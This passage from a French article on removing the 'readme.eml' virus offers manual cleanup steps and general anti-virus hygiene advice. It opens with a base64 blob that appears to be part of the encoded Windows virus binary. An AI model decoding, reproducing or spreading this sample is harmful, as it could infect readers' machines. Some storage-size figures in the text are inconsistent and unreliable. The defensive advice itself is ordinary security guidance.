N0IGJlIHJ1biB1bmRlciBXaW4zMg0KJDcAiFBFAAJMAQQAAbUs74IACOAAAY6BCwECGQABAgADBgAHEA
ADEAADIAAEQAACEAADAgACAQAHAwABCgAGUAADBAAGAgAFEAACIAAEEAACEAAGEAAMMAACTgAcQAACDABTQ09ERQAFEAADEAADAgADBgAOIAACYERBVEEABRAAAyAAAwIAAwgADkAAAsAuaWRhdGEAAxAAAzAA
AwIAAwoADkAAAsAucmVsb2MAAxAAA0AAAwIAAwwADkAAAlAA/wD/AP8Aa8P/JTAwQAD/AP8A/wD9KDAACjgwAAIwMAAWR
jAABkYwAAZLRVJORUwzMi5kbGwABFNsZWVwAP8AtRAAAgwAAwMwAP8A/wD/APkAAF+KB0cKwHQNUIvEagFQU/9WOFjr7A+2D0
fjEVFQi8RqAVBT/1Y4WFni8evVw+nIAAAAgewAAQAAM/aL/Ga4DQq5DAAAAPzzZqvo9vD//4sUtAPhig
JC/KoKwHX36AkAAAC3osvNz/vPogDoBAAAABiocnVYagD/EAvAdFeL2OgEAAAAPjxzdVhqBVP/EAvAdE
KL2OgEAAAAKMxydV+B7AAQAABUaAAQAABqDVP/F4HEABAAAAvAdRtUaAAQAABqDFP/F0aD5gd1CoHEAA
EAAMnCBADoBAAAAGbviXVYaPQBAAD/EOlR////6cgAAACLXQiB7AABAACL/OgIAAAAUnVub25jZQBeaAABAADoBAAAACW8CnZYV
FdqAGoAVlP/EFjoBAAAADYZCnZYagBqAGoEagBT/xDoBAAAAJYbCnZYaAABAABXagFqAFZT/xDr0enIAAAA6AQ
AAADkczR2WP91CGoAaP8PHwD/EAvAdCyL2OgEAAAAoO80dlhq/1P/EOgAAAAAWYPBGpCQkOgEAAAAleY
4dlhqAVH/EMnCBADpyAAAAGBQDwFMJP5Yg8AYixiLUAToCwAAAGCJGIlQBPzzpGHP+maPAGaPQAaLdQi
LfQyLTRDM+2HJwgwA6cgAAABgi0UIagBQUGoA/5aQAAAAYcnCBAAAAAAAAAAAAMMAAAAAAAAAAAAAAAA
AAAD1g/3V
Sa taille sur disque, 14’894 octets (14 Ko ou kB), mais 14'930 bytes (14,58
kB) dans un éditeur de texte encodage ANSI, ces bytes sont à multiplier par
autant de fois que ce fichier figure dans le disque ou éventuellement dans la
RAM. Il faut aussi savoir qu’un cluster (parcelle [facilement] adressable
d’allocation de données) ne peut être occupé que totalement et ce par un
seul ou une seule partie/fraction d’un et un seul fichier fut-il d’un seul byte
voire d’un seul bit. Si nous voyons les différentes tailles d’espaces d’allocation
de fichiers, nous constatons qu’une seule copie du fichier « readme.eml » peut
occuper jusqu’à 32'768 kB (32 MégaBytes) d’espace disque/mémoire. Si vous
avez 10'000 répertoires infestés sur votre disque dur, vous perdrez 32 MB *
10'000 = 320'000 MB = 312 GB (1/3 de Téra) d’espace de stockage, et ceci
c’est sans compter les 118 bytes de chaque ligne de script ajouté à la fin de
Nz. Luyalu DIASOLUKA Jean-Dadet Baptiste
- 7/16 -
jeudi 22 août 2019 (1:53 PM)
Le Virus « readme.eml » désormais dompté
chaque fichier « .html » infecté par le script. Ci-haut nous avons vu qu’il y en
avait au moins 9 dans un seul fichier infecté : 9 * 118 = 1'062 bytes rien que
pour ce fichier-là.
Comment débarrasser de ce virus un fichier infesté tout en préservant son
travail contenu dans le fichier infesté ? L’antivirus ne nettoie pas le fichier, mais
supprime bonnement le fichier, avec lui votre travail de plusieurs heures voire
plusieurs jours. La solution est donc de procéder manuellement.
Nz. Luyalu DIASOLUKA Jean-Dadet Baptiste
- 8/16 -
jeudi 22 août 2019 (1:53 PM)
Le Virus « readme.eml » désormais dompté
QUELQUES PISTES DE SOLUTIONS MANUELLES :
Puisque le fichier infesté ne peut exister dans une machine ayant un bon antivirus – la liste ci-après n’est pas exhaustive ni ne signifie que tous sont aussi
efficaces contre le virus dont nous parlons (360 TOTAL SECURITY, AegisLab,
AhnLab-V3, Alibaba, ALYac, Antiy-AVL, Arcabit, Avast, AVG, Avira, AVware, Baidu, Bitdefender, Bkav, BullGuard, CAT-QuickHeal, ClamAV, CMC, Comodo,
CrowdStrike Falcon (ML), Cyren, DrWeb, Emsisoft, eScan, ESET-NOD32, Fortinet,
F-Prot, F-Secure, G DATA, Ikarus, Invincea, Jiangmin, K7AntiVirus, K7GW, Kaspersky, Kingsoft, Malwarebytes, McAfee, McAfee-GW-Edition, Microsoft Essentials, NANO-Antivirus, nProtect, PANDA, Qihoo-360, Quick Heal, Rising, Sophos , SUPERAntiSpyware, Symantec (Norton), Tencent, TheHacker, Trend Micro,
TrendMicro-HouseCall, VBA32, VIPRE, ViRobot, Windows Defender, Yandex, Zillya, ZoneAlarm, Zoner …), on est obligé de replonger dans cette eau polluée
(rentrer dans la machine infesté/infestante) pour le récupérer (mais aussi pour
récupérer une bonne fois pour toutes tous les autres fichiers utiles pour ne
plus avoir à revenir dans cet environnement infesté).
Il faut charger tous les fichiers « .html » dans un éditeur (l’un après l’autre) en
prenant soin de désactiver le « reload automatique » [des fichiers de travail],
et supprimez l’ajout que le virus y a placé (voir page 2) et, du sein de l’éditeur
faites deux ou trois copies de chaque fichier directement vers le support externe (amovible) en ajoutant, à chaque fois, une extension inconnue.
Aussitôt terminé, rentrez directement dans un ordinateur protégé en
s’assurant que son antivirus est déjà pleinement chargé et qu’il est efficace.
Enfichez-y le support externe et lancez la recherche du fichier « readme.elm »
à partir du répertoire racine (= répertoire principal) :
Nz. Luyalu DIASOLUKA Jean-Dadet Baptiste
- 9/16 -
jeudi 22 août 2019 (1:53 PM)
Le Virus « readme.eml » désormais dompté
Si ces fichiers existent, sélectionnez-les avec « CTRL-A » et supprimez-les avec
« SHIFT-DEL » ou « CTRL-DEL » (pour ne pas les envoyer dans la corbeille),
parce qu’un antivirus peut éventuellement ne pas les supprimer.
Ensuite, faites un SCAN complet du support amovible en faisant un « CLICDROIT » sur son icône puis en cliquant-gauche sur « Scanner avec antivirus ».
LES PRINCIPES GÉNÉRAUX :
1. Sauvegardez TOUJOURS des copies de TOUS vos fichiers de travail sous
plusieurs formats différents préférentiellement inter-convertibles (par
exemple en plus, aux formats «.RTF» et «.PDF», sans négliger le format
«.TXT» pour les fichiers « .html », «.doc»…).
2. Le vieil adage qui conseille de faire RÉGULIÈREMENT des backups [sur un
autre support, de préférence amovible] reste bien vivant. Faites donc aussi
des backup puis renommer les fichiers ainsi sauvegardés, sous d’autres extensions, par exemple en copiant sous l’extension «.dad» tous les fichiers,
par exemple avec cette commande du DOS à partir de l’environnement
«DOS» (qui a dit que le MS-DOS était mort ?) :
<CTRL-ESC> CMD <CR> pour accéder à l’environnement DOS, puis tapez-y
ce qui suit :
Nz. Luyalu DIASOLUKA Jean-Dadet Baptiste
- 10/16 -
jeudi 22 août 2019 (1:53 PM)
Le Virus « readme.eml » désormais dompté
Répondez par «R» à la question ci-dessus. Ou bien alors utilisez la commande
explicite comme ceci:
Voici une partie du résultat de la copie (backup):
La commande «XCOPY» exige que le répertoire source ne se chevauche pas
avec la cible.
Après, il faut renommer les fichiers avec par exemple l’extension «.dad», pour
chaque répertoire :
Nz. Luyalu DIASOLUKA Jean-Dadet Baptiste
- 11/16 -
jeudi 22 août 2019 (1:53 PM)
Le Virus « readme.eml » désormais dompté
3. Faites des copies des fichiers «.doc», «.html» et «.htm», en prenant soin de
leur ajouter d’autres extensions (qui n’existent pas pour se camoufler aux
yeux des virus) aux noms des copies, après et avant chaque édition, pour
avoir une version de contenu «readily» éditable avec le logiciel qui les a
créés. Ces sauvegardes doivent se faire directement du sein de l’éditeur
avant de fermer le fichier en cours d’édition.
Avec ces deux solutions, l’auteur du virus a gagné, car il y a vraiment consommation d’espace disque !
4. Avant cette fermeture, et à la prochaine édition de ce texte, vérifiez à la fin
du fichier qu’il n’y a pas le code malveillant ci-dessus au paragraphe 1. Effacez ce code et sauvegardez directement le fichier sous plusieurs formats
et aussi sous le même format mais avec plusieurs extensions inconnues.
Là aussi l’auteur du virus a gagné, car il y a vraiment perte de temps !
5. Quand vous travaillez sur des fichiers «.html» ou «.htm», sauvegardez votre
travail en plusieurs copies en ajoutant d’autres extensions (qui n’existent
pas) aux noms des copies. Ces sauvegardes doivent se faire directement du
sein de l’éditeur avant de fermer le fichier en cours d’édition.
6. Évitez de vous connecter sur Internet (évitez d’allumer le gestionnaire WiFi)
tant que votre antivirus (qui DOIT être d’une très bonne marque et récemment mis à jour) n’est pas encore activé.
7. Ne branchez pas votre flash disk sur une machine non protégée. Vous risquez d’infester cette machine au cas où vous avec le virus dans le flashdisk, ou d’en recevoir si la machine est infestée.
8. Ne branchez un flash disk ou un disque dur externe que quand l’antivirus
est complètement chargé et s’est activé (son icone s’affiche sur la barre des
Nz. Luyalu DIASOLUKA Jean-Dadet Baptiste
- 12/16 -
jeudi 22 août 2019 (1:53 PM)
Le Virus « readme.eml » désormais dompté
tâches), au risque de contaminer la machine. Si cette machine contient un
antivirus mais aussi le virus, c’est que l’antivirus est inefficace ou périmé, et
votre disque sera infesté.
9. Le corollaire : Dès que vous éteignez la machine, débranchez tous les supports externes pour que le prochain allumage ne les trouve pas en place.
L’antivirus peut ne pas avoir terminé sa désinfestation durant la dernière
session de Windows, le virus prendra alors le contrôle de la machine entre
l’allumage et le chargement de l’antivirus, et éventuellement paralyser
l’antivirus pour régner en maître.
10. Dès que vous chargez un support externe, scannez-le profondément
avec votre puissant antivirus. Vous pouvez et devez faire scanner TOUS vos
supports (externes et internes) sur une machine contenant un puissant antivirus.
11. Évitez de copier des fichiers (fichiers de programme ou de données) en
provenance de sources peu sûres.
12. N’acceptez jamais des supports en provenance d’autres utilisateurs. Pour
faire une copie à quelqu’un, il ne faut accepter que des supports tout neufs
encore dans l’emballage d’origine, ou mieux gravez-lui la copie sur un CD
ou un DVD.
13. Quand vous êtes connecté sur Internet, utilisez toujours un navigateur
qui vérifie la sécurité des sites suspects de malveillance et qui vous en
alerte.
14.
Déconnectez votre machine du WiFi dès que vous n’en avez plus besoin.
15. Pour désinfecter un disque dur interne infesté, détachez-le de son ordinateur, installez-le dans un adaptateur externe, et branchez-le sur un ordinateur complètement booté, donc y compris la dernière version d’un antiNz. Luyalu DIASOLUKA Jean-Dadet Baptiste
- 13/16 -
jeudi 22 août 2019 (1:53 PM)
Le Virus « readme.eml » désormais dompté
virus puissant qui doit être déjà actif dans la machine.
16. Si vous avez travaillé sur un ordinateur suspect avec votre flash-disc ou
votre disque dur externe, sauvegardez doublement directement du sein de
l’éditeur tous vos fichiers de travail récents en renommant les extensions
des doubles, puis la première chose à faire quand vous rentrez chez vous
est de scanner tout le média avec un antivirus récent.
17.
Les cybercafés sont des portails très périlleux en matière de virus.
Ces conseils aident à bien ménager manuellement le virus dont il est question
ci-dessus, car les antivirus ne font rien d’autre qu’effacer les fichiers infectés
qui sont parfois trop précieux.
Kinshasa, le jeudi 22 août 2019 (1:53 PM)
Mots-clés :
virus, Sécurité Informatique, Internet, démoniaque, comportement, intentions,
supports d’information, disques durs, mémoires électroniques, flash disk,
cartes mémoires, fichiers infectés, bande passante, Avira, AVG, Avast, Kaspersky, McAfee, Norton, PANDA
Nz. Luyalu DIASOLUKA Jean-Dadet Baptiste
- 14/16 -
jeudi 22 août 2019 (1:53 PM)
Le Virus « readme.eml » désormais dompté
DIASOLUKA Nz. Luyalu
Docteur en Médecine, Chirurgie & Accouchements (1977),
CNOM : 0866 - Spécialiste en ophtalmologie (1980)
Études humanités : Scientifique - Mathématiques & Physique.
Informaticien-amateur, Programmeur et WebMaster.
Chercheur indépendant, autonome et autofinancé, bénévole, sans aucun conflit d’intérêt ou liens d'intérêts ou
contrainte promotionnelle avec qui qu’il soit ou
quelqu’organisme ou institution / organisation que ce
soit, étatique, paraétatique ou privé, industriel ou commercial en relation avec le sujet présenté.
+243 - 851278216 - 899508675 - 991239212 - 902263541 - 813572818
[email protected]
Autre Lecture :
https://www.scribd.com/document/374738470/Le-Plus-Grand-Secret-de-La-Creation
D’autres publications pouvant aussi intéresser :
• https://www.scribd.com/document/377036251/Le-Dosage-Des-Medicaments-en-CacCas
• https://www.scribd.com/document/377035454/Le-Hasard-Des-Thermometres-Noncontact-a-Infrarouge
• https://www.scribd.com/document/376222482/Petite-Introduction-Aux-FonctionsJavaScript
• https://www.scribd.com/document/376221919/La-Foi-en-Jesus-Christ-Pour-Quoi-Faire
• https://www.scribd.com/document/375689778/Lacuite-visuelle-angulaire
• https://www.scribd.com/document/375349851/La-variable-This
• https://www.scribd.com/document/375024162/Fonctions-Imbriquees-en-JS
• https://www.scribd.com/document/374789297/Format-Interne-Des-Objets-JavaScript
• https://www.scribd.com/document/374788758/Iterations-en-JavaScript
• https://www.scribd.com/document/374738470/Le-Plus-Grand-Secret-de-La-Creation
• https://www.scribd.com/document/374597969/Nouvelle-Formule-d-IMC-indice-dedoduite-Selon-Dr-Diasoluka
• https://www.scribd.com/document/373847209/Property-Descriptors
• https://www.scribd.com/document/373833282/l-Objet-Global-Window
• https://www.scribd.com/document/372665249/Javascript-Tome-II
• https://www.scribd.com/document/355291488/motilite-oculaire-2
• https://www.scribd.com/document/355291239/motilite-oculaire-I
• https://www.scribd.com/document/355290248/Script-d-Analyses-Des-ReflexesPupillomoteurs
• https://www.scribd.com/document/321168468/Renseignements-Id-etAnthropometriques
Nz. Luyalu DIASOLUKA Jean-Dadet Baptiste
- 15/16 -
jeudi 22 août 2019 (1:53 PM)
Le Virus « readme.eml » désormais dompté
• https://www.scribd.com/document/320856721/Emission-31-Jul-2016
• https://www.scribd.com/document/318182982/Complication-Visuelle-du-Traitementde-La-Malaria
• https://www.scribd.com/document/318180637/Rapport-Entre-Oxymetrie-Et-TypeRespiration
• https://www.scribd.com/document/315746265/Classification-Des-Medicaments
• https://www.scribd.com/document/315745909/Incongruences-Heresies-etHeterodoxies-de-la-Notion-de-Laboratoire
• https://www.scribd.com/document/315745725/Rapport-Entre-Oxymetrie-Et-TypeRespiration
Nz. Luyalu DIASOLUKA Jean-Dadet Baptiste
- 16/16 -
jeudi 22 août 2019 (1:53 PM)
Téléchargement
Explore flashcards